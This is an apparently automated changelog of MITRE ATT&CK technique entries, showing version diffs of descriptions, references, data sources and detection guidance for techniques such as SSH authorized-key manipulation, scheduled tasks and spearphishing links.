external_references[4]['url']http://support.microsoft.com/kb/314984https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem
external_references[6]['source_name']Windows Event Forwarding PayneWikipedia Server Message Block
external_references[6]['description']Payne, J. (2015, November 23). Monitoring what matters - Windows Event Forwarding for everyone (even if you already have a SIEM.). Retrieved February 1, 2016.Wikipedia. (2017, December 16). Server Message Block. Retrieved December 21, 2017.
external_references[6]['url']https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siemhttps://en.wikipedia.org/wiki/Server_Message_Block
x_mitre_data_sources[1]Network Traffic: Network Traffic FlowLogon Session: Logon Session Creation
x_mitre_data_sources[2]Logon Session: Logon Session CreationNetwork Share: Network Share Access
x_mitre_data_sources[4]Network Share: Network Share AccessNetwork Traffic: Network Traffic Flow
x_mitre_version1.01.1
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Medium Detecting WMI Persistence', 'description': 'French, D. (2018, October 9). Detecting & Removing an Attacker’s WMI Persistence. Retrieved October 11, 2019.', 'url': 'https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96'}

[T1098.004] Account Manipulation: SSH Authorized Keys

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may modify the SSH <code>authorized_keys</code> t1Adversaries may modify the SSH <code>authorized_keys</code> 
>file to maintain persistence on a victim host. Linux distrib>file to maintain persistence on a victim host. Linux distrib
>utions and macOS commonly use key-based authentication to se>utions and macOS commonly use key-based authentication to se
>cure the authentication process of SSH sessions for remote m>cure the authentication process of SSH sessions for remote m
>anagement. The <code>authorized_keys</code> file in SSH spec>anagement. The <code>authorized_keys</code> file in SSH spec
>ifies the SSH keys that can be used for logging into the use>ifies the SSH keys that can be used for logging into the use
>r account for which the file is configured. This file is usu>r account for which the file is configured. This file is usu
>ally found in the user's home directory under <code>&lt;user>ally found in the user's home directory under <code>&lt;user
>-home&gt;/.ssh/authorized_keys</code>.(Citation: SSH Authori>-home&gt;/.ssh/authorized_keys</code>.(Citation: SSH Authori
>zed Keys) Users may edit the system’s SSH config file to mod>zed Keys) Users may edit the system’s SSH config file to mod
>ify the directives PubkeyAuthentication and RSAAuthenticatio>ify the directives PubkeyAuthentication and RSAAuthenticatio
>n to the value “yes” to ensure public key and RSA authentica>n to the value “yes” to ensure public key and RSA authentica
>tion are enabled. The SSH config file is usually located und>tion are enabled. The SSH config file is usually located und
>er <code>/etc/ssh/sshd_config</code>.  Adversaries may modif>er <code>/etc/ssh/sshd_config</code>.  Adversaries may modif
>y SSH <code>authorized_keys</code> files directly with scrip>y SSH <code>authorized_keys</code> files directly with scrip
>ts or shell commands to add their own adversary-supplied pub>ts or shell commands to add their own adversary-supplied pub
>lic keys. In cloud environments, adversaries may be able to >lic keys. In cloud environments, adversaries may be able to 
>modify the SSH authorized_keys file of a particular virtual >modify the SSH authorized_keys file of a particular virtual 
>machine via the command line interface or rest API. For exam>machine via the command line interface or rest API. For exam
>ple, by using the Google Cloud CLI’s “add-metadata” command >ple, by using the Google Cloud CLI’s “add-metadata” command 
>an adversary may add SSH keys to a user account.(Citation: G>an adversary may add SSH keys to a user account.(Citation: G
>oogle Cloud Add Metadata)(Citation: Google Cloud Privilege E>oogle Cloud Add Metadata)(Citation: Google Cloud Privilege E
>scalation) Similarly, in Azure, an adversary may update the >scalation) Similarly, in Azure, an adversary may update the 
>authorized_keys file of a virtual machine via a PATCH reques>authorized_keys file of a virtual machine via a PATCH reques
>t to the API.(Citation: Azure Update Virtual Machines) This >t to the API.(Citation: Azure Update Virtual Machines) This 
>ensures that an adversary possessing the corresponding priva>ensures that an adversary possessing the corresponding priva
>te key may log in as an existing user via SSH.(Citation: Ven>te key may log in as an existing user via SSH.(Citation: Ven
>afi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm)  Wh>afi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm)   W
>ere authorized_keys files are modified via cloud APIs or com>here authorized_keys files are modified via cloud APIs or co
>mand line interfaces, an adversary may achieve privilege esc>mmand line interfaces, an adversary may achieve privilege es
>alation on the target virtual machine if they add a key to a>calation on the target virtual machine if they add a key to 
> higher-privileged user. >a higher-privileged user.   SSH keys can also be added to ac
 >counts on network devices, such as with the `ip ssh pubkey-c
 >hain` [Network Device CLI](https://attack.mitre.org/techniqu
 >es/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-20 16:26:57.982000+00:002023-04-12 23:28:34.599000+00:00
descriptionAdversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config. Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config. Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. SSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd)
external_references[3]['source_name']Cybereason Linux Exim Wormcisco_ip_ssh_pubkey_ch_cmd
external_references[3]['description']Cybereason Nocturnus. (2019, June 13). New Pervasive Worm Exploiting Linux Exim Server Vulnerability. Retrieved June 24, 2020.Cisco. (2021, August 23). ip ssh pubkey-chain. Retrieved July 13, 2022.
external_references[3]['url']https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerabilityhttps://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-i3.html#wp1254331478
external_references[4]['source_name']Google Cloud Add MetadataCybereason Linux Exim Worm
external_references[4]['description']Google Cloud. (2022, March 31). gcloud compute instances add-metadata. Retrieved April 1, 2022.Cybereason Nocturnus. (2019, June 13). New Pervasive Worm Exploiting Linux Exim Server Vulnerability. Retrieved June 24, 2020.
external_references[4]['url']https://cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadatahttps://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability
external_references[5]['source_name']Azure Update Virtual MachinesGoogle Cloud Add Metadata
external_references[5]['description']Microsoft. (n.d.). Virtual Machines - Update. Retrieved April 1, 2022.Google Cloud. (2022, March 31). gcloud compute instances add-metadata. Retrieved April 1, 2022.
external_references[5]['url']https://docs.microsoft.com/en-us/rest/api/compute/virtual-machines/updatehttps://cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadata
external_references[6]['source_name']SSH Authorized KeysAzure Update Virtual Machines
external_references[6]['description']ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June 24, 2020.Microsoft. (n.d.). Virtual Machines - Update. Retrieved April 1, 2022.
external_references[6]['url']https://www.ssh.com/ssh/authorized_keys/https://docs.microsoft.com/en-us/rest/api/compute/virtual-machines/update
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_detectionUse file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file. In cloud environments, monitor instances for modification of metadata and configurations. Monitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config.Use file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file. In cloud environments, monitor instances for modification of metadata and configurations. Monitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config. For network infrastructure devices, collect AAA logging to monitor for rogue SSH keys being added to accounts.
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'SSH Authorized Keys', 'description': 'ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June 24, 2020.', 'url': 'https://www.ssh.com/ssh/authorized_keys/'}
x_mitre_contributorsAustin Clark, @c2defense
x_mitre_data_sourcesFile: File Modification
x_mitre_platformsNetwork
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Modification

[T1053.005] Scheduled Task/Job: Scheduled Task

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2022-07-06 20:20:13.871000+00:002023-04-07 17:11:17.807000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Scheduled Job: Scheduled Job CreationFile: File Modification
x_mitre_data_sources[1]Windows Registry: Windows Registry Key CreationScheduled Job: Scheduled Job Creation
x_mitre_data_sources[2]Command: Command ExecutionProcess: Process Creation
x_mitre_data_sources[3]Process: Process CreationCommand: Command Execution
x_mitre_data_sources[4]File: File ModificationWindows Registry: Windows Registry Key Creation
x_mitre_version1.21.3

[T1546.002] Event Triggered Execution: Screensaver

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-20 16:58:48.140000+00:002023-04-21 12:31:54.177000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[1]File: File ModificationCommand: Command Execution
x_mitre_data_sources[2]File: File CreationProcess: Process Creation
x_mitre_data_sources[3]Command: Command ExecutionFile: File Modification
x_mitre_data_sources[4]Process: Process CreationFile: File Creation
x_mitre_version1.01.1

[T1518.001] Software Discovery: Security Software Discovery

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-11 22:26:34.327000+00:002023-04-21 12:30:00.939000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[2]Process: Process CreationFirewall: Firewall Metadata
x_mitre_data_sources[4]Firewall: Firewall MetadataProcess: Process Creation
x_mitre_version1.31.4
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/581.html', 'external_id': 'CAPEC-581'}

[T1584.004] Compromise Infrastructure: Server

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may compromise third-party servers that can be ut1Adversaries may compromise third-party servers that can be u
>sed during targeting. Use of servers allows an adversary to >sed during targeting. Use of servers allows an adversary to 
>stage, launch, and execute an operation. During post-comprom>stage, launch, and execute an operation. During post-comprom
>ise activity, adversaries may utilize servers for various ta>ise activity, adversaries may utilize servers for various ta
>sks, including for Command and Control. Instead of purchasin>sks, including for Command and Control. Instead of purchasin
>g a [Server](https://attack.mitre.org/techniques/T1583/004) >g a [Server](https://attack.mitre.org/techniques/T1583/004) 
>or [Virtual Private Server](https://attack.mitre.org/techniq>or [Virtual Private Server](https://attack.mitre.org/techniq
>ues/T1583/003), adversaries may compromise third-party serve>ues/T1583/003), adversaries may compromise third-party serve
>rs in support of operations.  Adversaries may also compromis>rs in support of operations.  Adversaries may also compromis
>e web servers to support watering hole operations, as in [Dr>e web servers to support watering hole operations, as in [Dr
>ive-by Compromise](https://attack.mitre.org/techniques/T1189>ive-by Compromise](https://attack.mitre.org/techniques/T1189
>).>), or email servers to support [Phishing](https://attack.mit
 >re.org/techniques/T1566) operations.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_contributors['Dor Edry, Microsoft']
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 16:00:16.273000+00:002023-04-13 00:00:25.676000+00:00
descriptionAdversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations. Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations. Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations.
external_references[1]['source_name']ThreatConnect Infrastructure Dec 2020Koczwara Beacon Hunting Sep 2021
external_references[1]['description']ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.
external_references[1]['url']https://threatconnect.com/blog/infrastructure-research-hunting/https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
external_references[3]['source_name']Koczwara Beacon Hunting Sep 2021ThreatConnect Infrastructure Dec 2020
external_references[3]['description']Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.
external_references[3]['url']https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2https://threatconnect.com/blog/infrastructure-research-hunting/
x_mitre_data_sources[0]Internet Scan: Response MetadataInternet Scan: Response Content
x_mitre_data_sources[1]Internet Scan: Response ContentInternet Scan: Response Metadata
x_mitre_version1.11.2

[T1583.004] Acquire Infrastructure: Server

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may buy, lease, or rent physical servers that cat1Adversaries may buy, lease, or rent physical servers that ca
>n be used during targeting. Use of servers allows an adversa>n be used during targeting. Use of servers allows an adversa
>ry to stage, launch, and execute an operation. During post-c>ry to stage, launch, and execute an operation. During post-c
>ompromise activity, adversaries may utilize servers for vari>ompromise activity, adversaries may utilize servers for vari
>ous tasks, including for Command and Control. Instead of com>ous tasks, including for Command and Control. Adversaries ma
>promising a third-party [Server](https://attack.mitre.org/te>y use web servers to support support watering hole operation
>chniques/T1584/004) or renting a [Virtual Private Server](ht>s, as in [Drive-by Compromise](https://attack.mitre.org/tech
>tps://attack.mitre.org/techniques/T1583/003), adversaries ma>niques/T1189), or email servers to support [Phishing](https:
>y opt to configure and run their own servers in support of o>//attack.mitre.org/techniques/T1566) operations. Instead of 
>perations.  Adversaries may only need a lightweight setup if>compromising a third-party [Server](https://attack.mitre.org
> most of their activities will take place using online infra>/techniques/T1584/004) or renting a [Virtual Private Server]
>structure. Or, they may need to build extensive infrastructu>(https://attack.mitre.org/techniques/T1583/003), adversaries
>re if they want to test, communicate, and control other aspe> may opt to configure and run their own servers in support o
>cts of their activities on their own systems.(Citation: NYTS>f operations.  Adversaries may only need a lightweight setup
>tuxnet)> if most of their activities will take place using online in
 >frastructure. Or, they may need to build extensive infrastru
 >cture if they want to test, communicate, and control other a
 >spects of their activities on their own systems.(Citation: N
 >YTStuxnet)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_contributors['Dor Edry, Microsoft']
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 15:39:45.736000+00:002023-04-12 20:18:42.003000+00:00
descriptionAdversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Adversaries may use web servers to support support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)
external_references[1]['source_name']NYTStuxnetKoczwara Beacon Hunting Sep 2021
external_references[1]['description']William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017.Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.
external_references[1]['url']https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.htmlhttps://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
external_references[2]['source_name']ThreatConnect Infrastructure Dec 2020Mandiant SCANdalous Jul 2020
external_references[2]['description']ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.
external_references[2]['url']https://threatconnect.com/blog/infrastructure-research-hunting/https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
external_references[3]['source_name']Mandiant SCANdalous Jul 2020ThreatConnect Infrastructure Dec 2020
external_references[3]['description']Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.
external_references[3]['url']https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automationhttps://threatconnect.com/blog/infrastructure-research-hunting/
external_references[4]['source_name']Koczwara Beacon Hunting Sep 2021NYTStuxnet
external_references[4]['description']Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017.
external_references[4]['url']https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html
x_mitre_data_sources[0]Internet Scan: Response MetadataInternet Scan: Response Content
x_mitre_data_sources[1]Internet Scan: Response ContentInternet Scan: Response Metadata
x_mitre_version1.11.2

[T1598.003] Phishing for Information: Spearphishing Link

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
New Description
t1Adversaries may send spearphishing messages with a malicioust1Adversaries may send spearphishing messages with a malicious
> link to elicit sensitive information that can be used durin> link to elicit sensitive information that can be used durin
>g targeting. Spearphishing for information is an attempt to >g targeting. Spearphishing for information is an attempt to 
>trick targets into divulging information, frequently credent>trick targets into divulging information, frequently credent
>ials or other actionable information. Spearphishing for info>ials or other actionable information. Spearphishing for info
>rmation frequently involves social engineering techniques, s>rmation frequently involves social engineering techniques, s
>uch as posing as a source with a reason to collect informati>uch as posing as a source with a reason to collect informati
>on (ex: [Establish Accounts](https://attack.mitre.org/techni>on (ex: [Establish Accounts](https://attack.mitre.org/techni
>ques/T1585) or [Compromise Accounts](https://attack.mitre.or>ques/T1585) or [Compromise Accounts](https://attack.mitre.or
>g/techniques/T1586)) and/or sending multiple, seemingly urge>g/techniques/T1586)) and/or sending multiple, seemingly urge
>nt messages.  All forms of spearphishing are electronically >nt messages.  All forms of spearphishing are electronically 
>delivered social engineering targeted at a specific individu>delivered social engineering targeted at a specific individu
>al, company, or industry. In this scenario, the malicious em>al, company, or industry. In this scenario, the malicious em
>ails contain links generally accompanied by social engineeri>ails contain links generally accompanied by social engineeri
>ng text to coax the user to actively click or copy and paste>ng text to coax the user to actively click or copy and paste
> a URL into a browser.(Citation: TrendMictro Phishing)(Citat> a URL into a browser.(Citation: TrendMictro Phishing)(Citat
>ion: PCMag FakeLogin) The given website may be a clone of a >ion: PCMag FakeLogin) The given website may be a clone of a 
>legitimate site (such as an online or corporate login portal>legitimate site (such as an online or corporate login portal
>) or may closely resemble a legitimate site in appearance an>) or may closely resemble a legitimate site in appearance an
>d have a URL containing elements from the real site.   From >d have a URL containing elements from the real site.  Advers
>the fake website, information is gathered in web forms and s>aries may also link to "web bugs" or "web beacons" within ph
>ent to the adversary. Adversaries may also use information f>ishing messages to verify the receipt of an email, while als
>rom previous reconnaissance efforts (ex: [Search Open Websit>o potentially profiling and tracking victim information such
>es/Domains](https://attack.mitre.org/techniques/T1593) or [S> as IP address.(Citation: NIST Web Bug)  Adversaries may als
>earch Victim-Owned Websites](https://attack.mitre.org/techni>o be able to spoof a complete website using what is known as
>ques/T1594)) to craft persuasive and believable lures.> a "browser-in-the-browser" (BitB) attack. By generating a f
 >ake browser popup window with an HTML-based address bar that
 > appears to contain a legitimate URL (such as an authenticat
 >ion portal), they may be able to prompt users to enter their
 > credentials while bypassing typical URL verification method
 >s.(Citation: ZScaler BitB 2020)(Citation: Mr. D0x BitB 2022)
 >  From the fake website, information is gathered in web form
 >s and sent to the adversary. Adversaries may also use inform
 >ation from previous reconnaissance efforts (ex: [Search Open
 > Websites/Domains](https://attack.mitre.org/techniques/T1593
 >) or [Search Victim-Owned Websites](https://attack.mitre.org
 >/techniques/T1594)) to craft persuasive and believable lures
 >.
Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-21 16:01:47.611000+00:002023-04-15 17:38:48.406000+00:00
descriptionAdversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. Adversaries may also link to "web bugs" or "web beacons" within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address.(Citation: NIST Web Bug) Adversaries may also be able to spoof a complete website using what is known as a "browser-in-the-browser" (BitB) attack. By generating a fake browser popup window with an HTML-based address bar that appears to contain a legitimate URL (such as an authentication portal), they may be able to prompt users to enter their credentials while bypassing typical URL verification methods.(Citation: ZScaler BitB 2020)(Citation: Mr. D0x BitB 2022) From the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_contributors[4]Menachem GoldsteinElpidoforos Maragkos, @emaragkos
x_mitre_data_sources[1]Application Log: Application Log ContentNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[2]Network Traffic: Network Traffic FlowApplication Log: Application Log Content
x_mitre_version1.31.4
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Mr. D0x BitB 2022', 'description': 'mr.d0x. (2022, March 15). Browser In The Browser (BITB) Attack. Retrieved March 8, 2023.', 'url': 'https://mrd0x.com/browser-in-the-browser-phishing-attack/'}
external_references{'source_name': 'NIST Web Bug', 'description': 'NIST Information Technology Laboratory. (n.d.). web bug. Retrieved March 22, 2023.', 'url': 'https://csrc.nist.gov/glossary/term/web_bug'}
external_references{'source_name': 'ZScaler BitB 2020', 'description': 'ZScaler. (2020, February 11). Fake Sites Stealing Steam Credentials. Retrieved March 8, 2023.', 'url': 'https://www.zscaler.com/blogs/security-research/fake-sites-stealing-steam-credentials'}
x_mitre_contributorsMenachem Goldstein
x_mitre_contributorsJoas Antonio dos Santos, @C0d3Cr4zy

[T1566.002] Phishing: Spearphishing Link

Current version: 2.4

Version changed from: 2.3 → 2.4


Old Description
New Description
t1Adversaries may send spearphishing emails with a malicious lt1Adversaries may send spearphishing emails with a malicious l
>ink in an attempt to gain access to victim systems. Spearphi>ink in an attempt to gain access to victim systems. Spearphi
>shing with a link is a specific variant of spearphishing. It>shing with a link is a specific variant of spearphishing. It
> is different from other forms of spearphishing in that it e> is different from other forms of spearphishing in that it e
>mploys the use of links to download malware contained in ema>mploys the use of links to download malware contained in ema
>il, instead of attaching malicious files to the email itself>il, instead of attaching malicious files to the email itself
>, to avoid defenses that may inspect email attachments. Spea>, to avoid defenses that may inspect email attachments. Spea
>rphishing may also involve social engineering techniques, su>rphishing may also involve social engineering techniques, su
>ch as posing as a trusted source.  All forms of spearphishin>ch as posing as a trusted source.  All forms of spearphishin
>g are electronically delivered social engineering targeted a>g are electronically delivered social engineering targeted a
>t a specific individual, company, or industry. In this case,>t a specific individual, company, or industry. In this case,
> the malicious emails contain links. Generally, the links wi> the malicious emails contain links. Generally, the links wi
>ll be accompanied by social engineering text and require the>ll be accompanied by social engineering text and require the
> user to actively click or copy and paste a URL into a brows> user to actively click or copy and paste a URL into a brows
>er, leveraging [User Execution](https://attack.mitre.org/tec>er, leveraging [User Execution](https://attack.mitre.org/tec
>hniques/T1204). The visited website may compromise the web b>hniques/T1204). The visited website may compromise the web b
>rowser using an exploit, or the user will be prompted to dow>rowser using an exploit, or the user will be prompted to dow
>nload applications, documents, zip files, or even executable>nload applications, documents, zip files, or even executable
>s depending on the pretext for the email in the first place.>s depending on the pretext for the email in the first place.
> Adversaries may also include links that are intended to int> Adversaries may also include links that are intended to int
>eract directly with an email reader, including embedded imag>eract directly with an email reader, including embedded imag
>es intended to exploit the end system directly or verify the>es intended to exploit the end system directly. Additionally
> receipt of an email (i.e. web bugs/web beacons). Additional>, adversaries may use seemingly benign links that abuse spec
>ly, adversaries may use seemingly benign links that abuse sp>ial characters to mimic legitimate websites (known as an "ID
>ecial characters to mimic legitimate websites (known as an ">N homograph attack").(Citation: CISA IDN ST05-016)  Adversar
>IDN homograph attack").(Citation: CISA IDN ST05-016)  Advers>ies may also utilize links to perform consent phishing, typi
>aries may also utilize links to perform consent phishing, ty>cally with OAuth 2.0 request URLs that when accepted by the 
